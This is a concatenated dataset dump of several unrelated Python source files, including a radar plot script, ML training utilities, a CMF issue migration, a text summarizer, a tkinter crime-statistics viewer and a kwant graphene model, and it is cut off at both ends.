length=7, clip_on=False)\n\n cb = plt.colorbar(img, cmap=plot_values['cmap'], norm=plot_values['norm'],\n boundaries=plot_values['ticks'], ticks=plot_values['ticks'])\n cb.set_label('Speed (kts)')\n plt.title(plot_values['title'] + str(ts) + ' - '\n + str(ts + datetime.timedelta(days=1)))\n plt.xlim(ts, (ts + datetime.timedelta(days=1)))\n plt.xticks(rotation=45)\n plt.ylim(0,10)\n plt.ylabel('Height (km)')\n plt.xlabel('Time (UTC)')\n \n plt.savefig(image_directory + '/' + plot_values['save_name']\n + '.' + str(date) + '.000000.png', bbox_inches='tight') \n \n \n ","sub_path":"vad/vad_quicklooks.py","file_name":"vad_quicklooks.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"41878130","text":"from __future__ import print_function\n\nimport torch\nimport numpy as np\n\n\nimport sys\n\ndef info(type, value, tb):\n if hasattr(sys, 'ps1') or not sys.stderr.isatty():\n # we are in interactive mode or we don't have a tty-like\n # device, so we call the default hook\n sys.__excepthook__(type, value, tb)\n else:\n import traceback, pdb\n # we are NOT in interactive mode, print the exception...\n traceback.print_exception(type, value, tb)\n print\n # ...then start the debugger in post-mortem mode.\n # pdb.pm() # deprecated\n pdb.post_mortem(tb) # more \"modern\"\n\nsys.excepthook = info\n\ndef adjust_learning_rate(epoch, opt, optimizer):\n \"\"\"Sets the learning rate to the initial LR decayed by 0.2 every steep step\"\"\"\n steps = np.sum(epoch > np.asarray(opt.lr_decay_epochs))\n if steps > 0:\n new_lr = opt.learning_rate * (opt.lr_decay_rate ** steps)\n for param_group in optimizer.param_groups:\n param_group['lr'] = new_lr\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the accuracy over the k top predictions for the specified values of k\"\"\"\n with torch.no_grad():\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\nif __name__ == '__main__':\n meter = AverageMeter()\n\n\nfrom sklearn.decomposition import PCA\n\nimport visdom\nimport time\nimport PIL\nimport torchvision\nimport skimage\n\n\ndef pca_viz(f, K=10, solver='auto', img_normalize=True):\n ## expect ff to be N x D\n \n pca = PCA(\n n_components=K,\n svd_solver=solver,\n whiten=False\n )\n p_f = pca.fit_transform(f)\n\n import pdb; pdb.set_trace()","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"382971477","text":"\"\"\"Convert collector issue instances transcripts to WebTextDocument.\n\nThis is only necessary if you used a pre-1.0 version of the collector. If you\ndid, create an external method in your portal root:\n\n o id: collector_webtext_migration\n\n o title (optional): Upgrade collector issues (temporary)\n\n o module name: CMFCollector.webtext_migration.py\n\n o function name: collector_webtext_migration\n\nFor each collector, visit the visit the URL constructed of the URL for the\ncollector plus '/collector_webtext_migration'. This will run the method on\nthe collector, producing a (sparse) page reporting the changes, or that no\nchanges were necessary.\n\nThe process may take a while, if your site catalogs a lot of objects - the\nconverted issues are (necessarily) reindexed, internally and in the site\ncatalog.\n\nYou can delete the external method once you've upgraded your preexisting\nissues - it won't be needed after that.\"\"\"\n\nMIGRATE_ATTRIBUTES = ['effective_date',\n 'expiration_date',\n '_isDiscussable',\n '_stx_level', # even though we don't use it\n '_last_safety_belt_editor',\n '_last_safety_belt',\n '_safety_belt',\n ]\n\nfrom Products.CMFCollector.WebTextDocument import WebTextDocument\nfrom Products.CMFCollector.CollectorIssue import RULE\nimport re\n\ntidypre = re.compile(\"\\n</?pre collector:deleteme>\\n\").sub\ntidyleadspace = re.compile(\"\\n ([^ ])\").sub\n\ndef collector_webtext_migration(self):\n \"\"\"Migrate old CMF \"Document\" based transcripts to \"WebTextDocument\".\"\"\"\n total_changed = 0\n issues = self.objectValues(spec=\"CMF Collector Issue\")\n for issue in issues:\n transcript = issue.get_transcript()\n was_p_mtime = transcript._p_mtime\n was_creation_date = transcript.creation_date\n changed = 0\n if transcript.meta_type != \"WebText Document\":\n changed = 1\n webtext = WebTextDocument(transcript.id,\n title=transcript.title,\n description=transcript.description,\n text=transcript.text)\n for attr in MIGRATE_ATTRIBUTES:\n if hasattr(transcript, attr):\n setattr(webtext, attr, getattr(transcript, attr))\n issue._delObject(transcript.id)\n issue._setObject(webtext.id, webtext)\n transcript = getattr(issue, webtext.id)\n if changed or transcript.text_format != 'webtext':\n total_changed += 1\n transcript.text_format = 'webtext'\n transcript.cooked_text = ''\n text = tidypre('\\n', transcript.text)\n text = tidyleadspace('\\n\\\\1', transcript.text)\n text = text.replace('\\n<hr>\\n', '\\n' + RULE + '\\n')\n \n transcript.text = text # Ditch garbage\n transcript._edit('webtext', text) # Cook the text.\n transcript._p_mtime = was_p_mtime\n transcript.creation_date = was_creation_date\n transcript.meta_type = \"Collector Issue Transcript\"\n if total_changed:\n self.reinstate_catalog()\n return (\"Converted %d of %d issues, and reinstated catalog\"\n % (total_changed, len(issues)))\n else:\n return (\"No changes, all issues are current.\")\n","sub_path":"CMF/tags/ExtensionsBase/CMFCollector/Extensions/webtext_migration.py","file_name":"webtext_migration.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"517635925","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport gzip, pickle\n\ndef load_data(fn):\n with gzip.open(fn) as f:\n d = pickle.load(f)\n return d\n\ndef save_data(d, fn):\n with gzip.open(fn, \"w\") as f:\n pickle.dump(d, f)\n\n\n# In[2]:\n\n\nG_f_src = \"TEST.pkl.gz\"\nG_f_tar = \"AE1_in.pkl.gz\"\n\n\n# In[3]:\n\n\nG_hist_raw = load_data(G_f_src)\nprint(len(G_hist_raw))\n\n\n# In[4]:\n\n\nfrom scipy import stats\nimport numpy as np\n\ndef x_ae_col_1(col_1):\n \n l = len(col_1)\n \n #get ratio\n col_new = list()\n for i in range(l-1):\n x1 = col_1[i]\n x2 = col_1[i+1]\n\n r = (x2*1.0)/(x1+x2)\n if (r != r):\n r = 0.5\n col_new.append(r)\n\n return stats.zscore(col_new)\n\n\ndef x_ae_1(hist_1):\n \n if (len(hist_1)<26):\n return list()\n \n # column-wise processing r=(today/(today+yesterday))\n norm = list()\n for col in hist_1.columns:\n norm.append(x_ae_col_1(hist_1[col]))\n\n norm_T = np.transpose(norm)\n\n # flatten 20 lines\n l = len(norm_T)\n x_1 = list()\n for i in range(l-24):\n x_1.append(norm_T[i:i+20].flatten())\n \n return x_1\n\n\ndef k_ae_1(c, hist_1):\n return [(c, i) for i in hist_1.index[20:-5] ]\n\n\ndef y_ae_1(hist_1):\n y_1 = list()\n y_raw = hist_1[\"Adj Close\"]\n l = len(y_raw)\n for i in range(l-25):\n y_new = y_raw[i+24] / (y_raw[i+24] + y_raw[i+20])\n if (y_new != y_new):\n y_new = 0\n else:\n y_new = int((y_new-0.52)/100.0+1.0) # 1 if y_new>0.52\n \n y_1.append(y_new)\n \n return y_1\n\n\n\ndef kxy_ae(hist_all):\n \n #check blank\n max_len = 0\n for c in hist_all.keys():\n k_1 = k_ae_1(c, hist_all[c])\n if (max_len < len(k_1)):\n max_len = len(k_1)\n \n x_all, y_all, k_all = list(), list(), list()\n for c in hist_all.keys():\n k_1 = k_ae_1(c, hist_all[c])\n if (max_len == len(k_1)):\n k_all.extend(k_1)\n x_all.extend(x_ae_1(hist_all[c]))\n y_all.extend(y_ae_1(hist_all[c]))\n\n return (k_all, x_all, y_all)\n\n\n# In[5]:\n\n\nG_data_ae = kxy_ae(G_hist_raw)\n\n\n# In[ ]:\n\n\nprint(len(G_data_ae[0]), len(G_data_ae[1]), len(G_data_ae[2]))\nprint(sum(G_data_ae[2])/len(G_data_ae[2]))\n\n\n# In[ ]:\n\n\nsave_data(G_data_ae, G_f_tar)\n\n","sub_path":"testing/AE_1st_prep.py","file_name":"AE_1st_prep.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"612228673","text":"from typing import Union, List, Callable\nfrom settings import GOTHIC_FONT_PATH, GOTHIC_BOLD_FONT_PATH\n\nfrom rest_framework.serializers import ModelSerializer\n\nfrom reportlab.lib import colors\nfrom reportlab.lib.units import mm\nfrom reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\nfrom reportlab.lib.enums import TA_RIGHT, TA_CENTER\n\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.platypus import Table, Paragraph, TableStyle\n\n\nMARGINS = { 'top': 10*mm, 'bottom': 10*mm, 'right': 7*mm, 'left': 7*mm }\n\nGRIS_CLARO = 0xE0E0E0\nGRIS_OSCURO = 0xBDBBBC\n\ndef setUpStyles():\n styles = getSampleStyleSheet()\n\n styles.add(ParagraphStyle(name='Right', alignment=TA_RIGHT, fontSize=12, parent=styles['Normal']))\n styles.add(ParagraphStyle(name='Center', alignment=TA_CENTER, fontSize=12, parent=styles['Normal']))\n\n try: # En caso de que no exista el archivo de las fuentes\n pdfmetrics.registerFont(TTFont('Gothic', GOTHIC_FONT_PATH))\n pdfmetrics.registerFont(TTFont('Gothic-Bold', GOTHIC_BOLD_FONT_PATH))\n\n styles['Normal'].fontName='Gothic'\n styles['Normal'].fontSize=8\n styles['Heading3'].fontName='Gothic-Bold'\n styles['Heading3'].fontSize = 12\n\n except Exception:\n pass\n\n return styles\n\nstyles = setUpStyles()\n\ndef paragraph(text: Union[str, int], estilo: str = 'Normal') -> Paragraph:\n return Paragraph(text, styles[estilo])\n\nENTER = paragraph(\"<br/><br/>\")\n\ndef pdf_tabla(lines: ModelSerializer, colWidths, table_header: Callable, table_body: Callable) -> List[Table]:\n table_style = TableStyle(\n [('BACKGROUND', (0, 0), (-1, 0), colors.HexColor(GRIS_OSCURO))] + # La fila con los nombres de las columnas esta con fondo gris oscuro\n [('BACKGROUND', (0, i), (-1, i), colors.HexColor(GRIS_CLARO)) # Las filas pares tienen fondo gris claro\n for i in range(2, len(lines) + 1, 2)]\n )\n\n return [Table(\n table_header() + table_body(lines),\n colWidths=colWidths,\n style=table_style,\n )]\n","sub_path":"common/imprimir.py","file_name":"imprimir.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"11380177","text":"from nltk.tokenize import sent_tokenize, word_tokenize\r\nfrom nltk.corpus import stopwords\r\nfrom string import punctuation\r\n\r\ntext,sents,words = None, None, None\r\n\r\narticleUrl = r'https://www.washingtonpost.com/news/the-switch/wp/2016/10/18/the-pentagons-massive-new-telescope-is-designed-to-track-space-junk-and-watch-out-for-killer-asteroids/?utm_term=.edab3111d8dc'\r\n \r\n\r\nimport urllib.request as ul\r\nfrom bs4 import BeautifulSoup as bs\r\n\r\ndef getArticle(url=None):\r\n #articleUrl = r'https://www.washingtonpost.com/news/the-switch/wp/2016/10/18/the-pentagons-massive-new-telescope-is-designed-to-track-space-junk-and-watch-out-for-killer-asteroids/?utm_term=.edab3111d8dc'\r\n if url!=None:\r\n articleUrl = url\r\n page = ul.urlopen(articleUrl).read().decode('utf8','ignore')\r\n soup = bs(page,'html.parser')\r\n text = ' '.join(map(lambda p: p.text,soup.find_all('article')))\r\n #text = open('Pentagon1.txt','r').read()\r\n return text\r\n\r\ndef preProcess(text):\r\n #text = open('Pentagon1.txt','r').read()\r\n sents = sent_tokenize(text)\r\n #print(sents)\r\n\r\n word_sent = word_tokenize(text.lower())\r\n #print(word_sent)\r\n\r\n customStopWords = set(stopwords.words('english')+ list(punctuation))\r\n #print(customStopWords)\r\n\r\n wordsWOStopWords = [x for x in word_sent if x not in customStopWords]\r\n #print(wordsWOStopWords)\r\n\r\n return (wordsWOStopWords,sents)\r\n\r\n\r\n\r\n\r\nfrom nltk.probability import FreqDist\r\nfrom heapq import nlargest\r\n\r\ndef ImportanceLogic(words):\r\n #words,sents = ppreProcess()\r\n #print(words)\r\n freq = FreqDist(words)\r\n #print(dict(freq))\r\n #get top 10 important words\r\n ImportantWords = (nlargest(10,freq,key=freq.get))\r\n return freq,ImportantWords\r\n\r\nfrom collections import defaultdict\r\n\r\n\r\ndef Summarize(text,n):\r\n words,sents = preProcess(text)\r\n assert n<=len(sents)\r\n \r\n freq,ImportantWords = ImportanceLogic(words)\r\n\r\n #print(freq)\r\n ranking = defaultdict(int)\r\n #print(sents)\r\n for i,sent in enumerate(sents):\r\n for w in word_tokenize(sent.lower()):\r\n if w in freq:\r\n #print(sent,w,freq)\r\n ranking[i] += freq[w]\r\n #print(ranking)\r\n sents_idx = nlargest(4,ranking,key=ranking.get)\r\n #print(sents_idx)\r\n sorted_sents_idx = [sents[j] for j in sorted(sents_idx)]\r\n #print(sorted_sents_idx)\r\n return sorted_sents_idx\r\n\r\nimport sys\r\n\r\ndef main():\r\n #for x in sys.argv:\r\n # print(x)\r\n '''\r\n if len(sys.argv)!=2: #if command prompt two\r\n print(\"Usage: python Summarizing.py url\")\r\n sys.exit(1)\r\n else:\r\n url = sys.argv[1]\r\n #print(url)\r\n '''\r\n print(\"=\"*136)\r\n #for x in (Summarize(getArticle(url),3)):\r\n text = open('output.txt','r').read()\r\n for x in (Summarize(text,5)):\r\n print(x)\r\n print(\"=\"*136)\r\n \r\nif __name__ == '__main__':\r\n main()\r\n\r\n","sub_path":"Natural Language Processing/Medium Level NLP/Summarizing.py","file_name":"Summarizing.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"368437715","text":"from infra import api\nfrom infra.errors import api_error\n\nclass api_test():\n\n failCnt = 0\n failTst = []\n\n ###################################################\n def empty_ticker(self):\n print(\"...Testing empty ticker\") \n try:\n api.get_pd_df()\n except api_error as e:\n if e.msg != 'ticker not specified':\n self.failCnt += 1\n self.failTst.append('empty_ticker')\n\n ###################################################\n def ticker_default_period(self, ticker):\n print(\"...Testing get_pd_df for ticker {} with default period\".format(ticker.upper()))\n df = api.get_pd_df(ticker)\n print(df)\n\n ###################################################\n def plot_ticker(self, ticker):\n print(\"...Testing plot ticker {} adjusted close for 1 year\".format(ticker.upper()))\n df = api.get_pd_df(ticker, 'today', '-365')\n techInd = {\"SMA\": [10,50]}\n api.plot_chart(df['Adj Close'].sort_index(), '1 Year SPY', techInd=techInd)\n\n ###################################################\n def start_test(self):\n print(\"Starting api_test\")\n self.empty_ticker()\n self.ticker_default_period('spy')\n self.plot_ticker('spy')\n\n def summary(self):\n print(\"Summary:\")\n print(\" failCnt = {}\".format(self.failCnt))\n print(\" failTst = {}\".format(self.failTst))\n","sub_path":"tests/api_test.py","file_name":"api_test.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"90558355","text":"from tkinter import ttk\nimport tkinter\nimport json\nimport sqlite3\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg\nfrom matplotlib.figure import Figure\nfrom scipy import stats\nfrom scipy.stats import zscore\nimport math\nimport numpy\n\nclass mainWindow():\n\n finalVals = {}\n\n def __init__(self):\n self.__root = tkinter.Tk()\n self.__root.withdraw()\n self.createWindow()\n self.__root.mainloop()\n\n #Closes all windows\n def Exit(self):\n self.__root.quit()\n\n #Creates the Toplevel window on start\n def createWindow(self):\n self.__Window = tkinter.Toplevel()\n self.__Window.minsize(width = 200,height = 200)\n\n self.__QuitButton = tkinter.Button(self.__Window,text=\"Quit\",command=self.Exit)\n self.__QuitButton.grid(row=0,column=0)\n\n self.__WindowLabel = tkinter.Label(self.__Window)\n self.__WindowLabel.grid(row=1,column=0)\n self.__LabelCount = [0]\n\n self.__WindowFrame = tkinter.Frame(self.__Window)\n self.__WindowFrame.grid(row=3,column=0)\n\n self.__CrimeList = self.fetchNames()\n self.__WindowLabel[\"text\"] = self.__CrimeList[self.__LabelCount[0]]\n\n self.__crimeTree = tkinter.ttk.Treeview(self.__Window, columns = (\"1\"))\n self.__crimeTree.grid(row=2,column=0)\n self.__crimeTree.heading('#0',text=\"Area\")\n self.__crimeTree.heading('#1',text=\"Incidents\")\n self.__crimeTree.column('#1',stretch=tkinter.YES)\n self.__crimeTree.column('#0',stretch=tkinter.YES)\n \n self.__NextLabelButton = tkinter.Button(self.__WindowFrame,text=\"Next\",command=lambda :[self.nextList(self.__LabelCount),\n self.UpdateList(self.__WindowLabel,\n self.__CrimeList,\n self.__LabelCount)])\n self.__NextLabelButton.grid(row=0,column=1)\n self.__PrevLabelButton = tkinter.Button(self.__WindowFrame,text=\"Previous\",command=lambda :[self.prevList(self.__LabelCount),\n self.UpdateList(self.__WindowLabel,\n self.__CrimeList,\n self.__LabelCount)])\n self.__PrevLabelButton.grid(row=0,column=0)\n\n self.__graphButton = tkinter.Button(self.__WindowFrame,text=\"Plot Graph\",command=self.plotGraph)\n self.__graphButton.grid(row=0,column=2)\n\n self.__GraphCan = tkinter.Canvas(self.__Window)\n self.__GraphCan.grid(row=2,column=1)\n\n def nextList(self,count):\n if count[0] < 28:\n count[0] += 1\n\n def prevList(self,count):\n if count[0] > 0:\n count[0] -= 1\n\n #Updates the Label on the tkinter Toplevel window\n def UpdateList(self,Lab,LText,count):\n self.updateText = LText[count[0]]\n Lab[\"text\"] = self.updateText\n self.__query = (\"SELECT * FROM crime WHERE crime LIKE '\" + self.updateText + \"'\")\n\n #Runs the functions listed below\n self.__QueryValues = self.fetchResults(self.__query)\n self.populateTree(self.__QueryValues)\n self.createIntervals()\n \n #Fetches and returns the Names of each Crime from the CrimeNames.json file\n def fetchNames(self):\n with open('C:/Users/Jody/Desktop/Python/Research_Project/CrimeNames.json', 'r') as Data:\n self.__data = json.load(Data)\n return(self.__data[\"CrimeNames\"])\n \n #Fetches and returns the results of a query\n def fetchResults(self,query):\n #Original\n # self.__connection = sqlite3.connect(\"C:/Users/Jody/Desktop/Python/Research_Project/CrimeData.db\")\n self.__connection = sqlite3.connect(\"C:/Users/Jody/Desktop/Python/Research_Project/PopulationPropCrimeData.db\")\n self.__cur = self.__connection.cursor()\n self.__cur.execute(query)\n self.__data = self.__cur.fetchall()\n self.__connection.close()\n return self.__data\n\n #Populates the Treeview tkinter widget\n def populateTree(self,Values):\n self.__crimeTree.delete(*self.__crimeTree.get_children())\n for x in range(len(Values)):\n self.__crimeTree.insert(\"\",'end',text=Values[x][1],values=(Values[x][3]))\n\n #Fetches a list of incidents from the database\n def getIncidents(self):\n self.__temp = []\n self.__query = (\"SELECT proportion FROM crime WHERE crime LIKE '\" + self.__CrimeList[self.__LabelCount[0]] + \"'\")\n #Original\n # self.__query = (\"SELECT incident FROM crime WHERE crime LIKE '\" + self.__CrimeList[self.__LabelCount[0]] + \"'\")\n self.__data = self.fetchResults(self.__query)\n for i in self.__data:\n self.__temp.append(i)\n return(self.__temp)\n\n def findQuartiles(self):\n self.__count = 0\n self.__Q1 = 0\n self.__Q2 = 0\n self.__Q3 = 0\n for x in self.__numbers:\n if self.__count == 75 or self.__count == 76:\n self.__Q2 = self.__Q2 + x\n elif self.__count == 38:\n self.__Q1 = x\n elif self.__count == 113:\n self.__Q3 = x\n self.__count+=1\n self.__Q2 = self.__Q2/2\n return(self.__Q1,self.__Q2,self.__Q3)\n\n #Creates bins for the incidents to be sorted into\n def createIntervals(self):\n self.__numbers = []\n self.__tuple = self.getIncidents()\n for x in range(len(self.__tuple)):\n self.__numbers.append(self.__tuple[x][0])\n\n self.__numbers.sort()\n\n self.ZVals = zscore(self.__numbers)\n #scipy cumulative freq table\n #self.__res = stats.cumfreq(self.__numbers, numbins=10)\n \n self.__std = numpy.std(self.__numbers)\n #Original\n # self.__Scott = math.ceil((3.49*self.__std*(len(self.__numbers))**(-1/3)))\n self.__Scott = ((3.49*self.__std*(len(self.__numbers))**(-1/3)))\n print(\"SC Rule: \",self.__Scott)\n\n self.__Q1,self.__Q2,self.__Q3 = self.findQuartiles()\n print(self.__Q1, self.__Q2, self.__Q3)\n self.__interQRange = self.__Q3-self.__Q1\n print(\"Interquartile Range: \", self.__interQRange)\n self.__innerFence = self.__interQRange*1.5\n self.__outerFence = self.__interQRange*3\n \n self.__innerBoundaryLow = self.__Q1 - self.__innerFence\n self.__innerBoundaryHigh = self.__Q3 + self.__innerFence\n self.__outerBoundaryLow = self.__Q1 - self.__outerFence\n self.__outerBoundaryHigh = self.__Q3 + self.__outerFence\n print(\"Inner Bounds: \", self.__innerBoundaryLow, \" - \", self.__innerBoundaryHigh)\n print(\"Outer Bounds: \", self.__outerBoundaryLow, \" - \", self.__outerBoundaryHigh)\n\n self.__FD = math.ceil(2*(self.__Q3-self.__Q1)*(len(self.__numbers))**(-1/3))\n print(\"FD Rule: \",self.__FD)\n print(\"LAST NUM : \",self.__numbers[-1])\n #Original\n # self.__TESTINTERVAL = math.ceil((self.__numbers[-1]-self.__numbers[0])/self.__Scott)\n self.__TESTINTERVAL = ((self.__numbers[-1]-self.__numbers[0])/self.__Scott)\n print(\"Bin Size: \",self.__TESTINTERVAL)\n\n self.__freq = []\n self.__intervals = []\n self.__count = 0\n\n self.__ploty = []\n #for a in range(self.__interval):\n for a in range(math.ceil(self.__Scott) + 1):\n self.__intervals.append(a*self.__TESTINTERVAL)\n self.__count += 1\n self.__ploty.append(a*self.__TESTINTERVAL)\n \n if self.__count == 2:\n self.__temp = [self.__intervals[0],self.__intervals[1]]\n self.__count = self.__count - 1\n self.__freq.append(self.__temp)\n del self.__intervals[0]\n\n #Counts the incidents per interval\n def sortIncidents(self):\n self.__incidents = []\n self.__numbers = []\n self.__omitted = []\n self.__tuple = self.getIncidents()\n self.__freq.sort()\n for x in range(len(self.__tuple)):\n self.__numbers.append(self.__tuple[x][0])\n\n for data in self.__numbers:\n found = None\n count = 0\n while found != True:\n #print(data, \" In: \", self.__freq[count][0], \" - \", self.__freq[count][1])\n if data > self.__outerBoundaryHigh:\n print(self.__outerBoundaryHigh)\n self.__omitted.append(data)\n found = True\n continue\n if data >= self.__freq[count][0] and data < self.__freq[count][1]:\n try:\n self.__incidents[count][0] = self.__incidents[count][0] + 1\n except IndexError:\n self.__incidents.append([1,self.__freq[count]])\n found = True\n count = count + 1\n \n print(\"Numbers omitted: \",self.__omitted)\n return self.__incidents\n\n #Plots the graph using the List created from sortIncidents\n def plotGraph(self):\n f = Figure(figsize=(10,5), dpi=100)\n a = f.add_subplot(111)\n self.__incidents = self.sortIncidents()\n self.__plotx = []\n self.__testFreq = []\n self.__numbers = self.ZVals\n for x in self.__incidents:\n self.__plotx.append(x[0])\n self.__testFreq.append(x[1])\n print(\"Length: \",range(len(self.__numbers)))\n negative = 0\n for i in range(len(self.__numbers)):\n for o in self.__omitted:\n if self.__numbers[i - negative] == o:\n negative = negative + 1\n del self.__numbers[i - negative]\n\n #a.hist(self.__plotx,self.__ploty,histtype='bar',rwidth=0.8)\n a.hist(self.__numbers,histtype='bar',rwidth=0.8)\n\n f.suptitle(self.__CrimeList[self.__LabelCount[0]])\n a.set_ylabel(\"Number of Stations\")\n a.set_xlabel(\"Number of Incidents\")\n\n #a.hist(self.plotZ(),rwidth=0.5)\n # print(\"Z-Scores: \",self.plotZ())\n print(\" \")\n self.exportCSV()\n self.__GraphCan = FigureCanvasTkAgg(f,self.__Window)\n self.__GraphCan.show()\n self.__GraphCan.get_tk_widget().grid(row=2,column=1)\n \n def plotZ(self):\n self.__total = 0\n for x in self.__numbers:\n self.__total += x\n self.__mean = (self.__total/len(self.__numbers))\n self.__ZValues = []\n self.__ZScores = [0,1,2]\n for i in self.__ZScores:\n self.__ZValues.append((i*self.__std)+self.__mean)\n return self.__ZValues\n\n def exportCSV(self):\n vals = [self.__Q1,self.__Q2,self.__Q3]\n # vals = self.plotZ()\n\n self.finalVals[self.updateText] = {}\n categories = {'One': 0, 'Two': 0, 'Three': 0, 'Four': 0}\n for x in self.__QueryValues:\n if(x[3] <= vals[0]):\n self.finalVals[self.updateText][x[1]] = 1\n categories['One'] = categories['One'] + 1\n # print(x[3], \" <= \", vals[0], \" ONE\")\n elif(x[3] <= vals[1] and x[3] > vals[0]):\n self.finalVals[self.updateText][x[1]] = 2\n categories['Two'] = categories['Two'] + 1\n # print(vals[0], \" > \", x[3], \" <= \", vals[1], \" TWO\")\n elif(x[3] <= vals[2] and x[3] > vals[1]):\n self.finalVals[self.updateText][x[1]] = 3\n categories['Three'] = categories['Three'] + 1\n # print(vals[1], \" > \", x[3], \" <= \", vals[2], \" THREE\")\n elif(x[3] > vals[2]):\n self.finalVals[self.updateText][x[1]] = 4\n categories['Four'] = categories['Four'] + 1\n # print(x[3], \" > \", vals[2], \" FOUR\")\n\n with open('C:/Users/Jody/Desktop/Python/Research_Project/SortedCrimeData.json', 'r') as File:\n temp = json.load(File)\n temp.update(self.finalVals)\n with open('C:/Users/Jody/Desktop/Python/Research_Project/SortedCrimeData.json', 'w') as Data:\n json.dump(temp,Data, indent=4)\n # print(categories['One'] + categories['Two'] + categories['Three'] + categories['Four'])\n # for each in categories:\n # print(each)\n # print(categories[each])\nmainWindow()","sub_path":"Project/FinalActualFinal.py","file_name":"FinalActualFinal.py","file_ext":"py","file_size_in_byte":12714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"438198624","text":"import kwant\nfrom math import pi,sqrt,tanh\nimport numpy as np\nfrom matplotlib import pyplot\nfrom kwant.digest import uniform\nfrom types import SimpleNamespace\n\npauli_z = np.array([[1,0],[0,-1]])\nsin_30, cos_30 = (1 / 2, sqrt(3) / 2)\ngraphene = kwant.lattice.general([(1, 0), (sin_30, cos_30)],\n\t\t\t\t\t\t\t\t [(0, 0), (0, 1 / sqrt(3))])\n\na, b = graphene.sublattices\n\ndef lin0(y,W,jw) :\n\tif y < -jw :\n\t\treturn -2 \n\telif -jw <= y < jw :\n\t\treturn 2*y/jw\n\telse :\n\t\treturn 2\n\ndef lin1(y,W,jw) :\n\tif y < -W/6-jw :\n\t\treturn -2 \n\telif -W/6-jw <= y < -W/6+jw :\n\t\treturn (y+W/6)/jw - 1\n\telif -W/6+jw <= y < W/6-jw :\n\t\treturn 0\n\telif W/6-jw <= y < W/6+jw :\n\t\treturn (y-W/6)/jw + 1\n\telse :\n\t\treturn 2\n\ndef lin2(y,W,jw) :\n\tif y < -jw :\n\t\treturn 0 \n\telif -jw <= y < jw :\n\t\treturn y/jw+1\n\telse :\n\t\treturn 2\n\ndef tan_lin0(y,W,jw) :\n\treturn tanh((y)/(jw/2))\n\ndef tan_lin1(y,W,jw) :\n\treturn 0.5*(tanh((y-1*W/20)/(jw/2))+tanh((y+1*W/20)/(jw/2)))\n\n\ndef make_system(W = 10*sqrt(3), L = 10, delta = 0, t = 1.6, lambda_so = 0) :\n\t\n\tlambda_so = 1j*lambda_so/(3*sqrt(3))\n\tt_nn1_a = 1 * lambda_so * pauli_z # [ 1, 0]\n\tt_nn1_b = -1 * lambda_so * pauli_z\n\tt_nn2_a = -1 * lambda_so * pauli_z # [ 0, 1]\n\tt_nn2_b = 1 * lambda_so * pauli_z\n\tt_nn3_a = -1 * lambda_so * pauli_z # [ 1, -1]\n\tt_nn3_b = 1 * lambda_so * pauli_z\n\tWex = 0 \n\n\tdef channel(pos):\n\t\tx, y = pos\n\t\treturn (0 <= x <= L) and (-(W/2+Wex) < y <= (W/2+Wex)) \n\n\tsyst = kwant.Builder()\n\t\n\tdel_fn = lambda y,W : tan_lin1(y,W,W/20) \t\n\t\n\tdef potential(site, U, U_disorder, Mex, salt):\n\t\t(x, y) = site.pos\n\t\td = -1\n\t\tif (site.family == a) :\n\t\t\td = 1\n\t\tterm1 = d*delta*del_fn(y,W)*np.eye(2)\n\t\tterm2 = U*np.eye(2)\n\t\tterm3 = Mex*pauli_z\n\t\tterm4 = U_disorder * (uniform(repr(site), repr(salt)) - 0.5) * np.eye(2)\n\t\treturn term1 + term2 + term3 + term4\n\n\n\tdef dummy(site, Mex):\n\t\t(x, y) = site.pos\n\t\td = -1\n\t\tif (site.family == a) :\n\t\t\td = 1\n\t\tterm1 = d*delta*del_fn(y,W)*np.eye(2)\n\t\tterm2 = Mex*pauli_z\n\t\treturn term1 + term2\n\n\n\tsyst[graphene.shape(channel, (0, 0))] = potential\n\thoppings = (((0, 0), a, b), ((0, 1), a, b), ((-1, 1), a, b))\n\tsyst[[kwant.builder.HoppingKind(*hopping) for hopping in hoppings]] = -t*np.eye(2)\n\tsyst[kwant.builder.HoppingKind((1, 0), a, a)] = t_nn1_a\n\tsyst[kwant.builder.HoppingKind((1, 0), b, b)] = t_nn1_b\n\tsyst[kwant.builder.HoppingKind((0, 1), a, a)] = t_nn2_a\n\tsyst[kwant.builder.HoppingKind((0, 1), b, b)] = t_nn2_b\n\tsyst[kwant.builder.HoppingKind((1, -1), a, a)] = t_nn3_a\n\tsyst[kwant.builder.HoppingKind((1, -1), b, b)] = 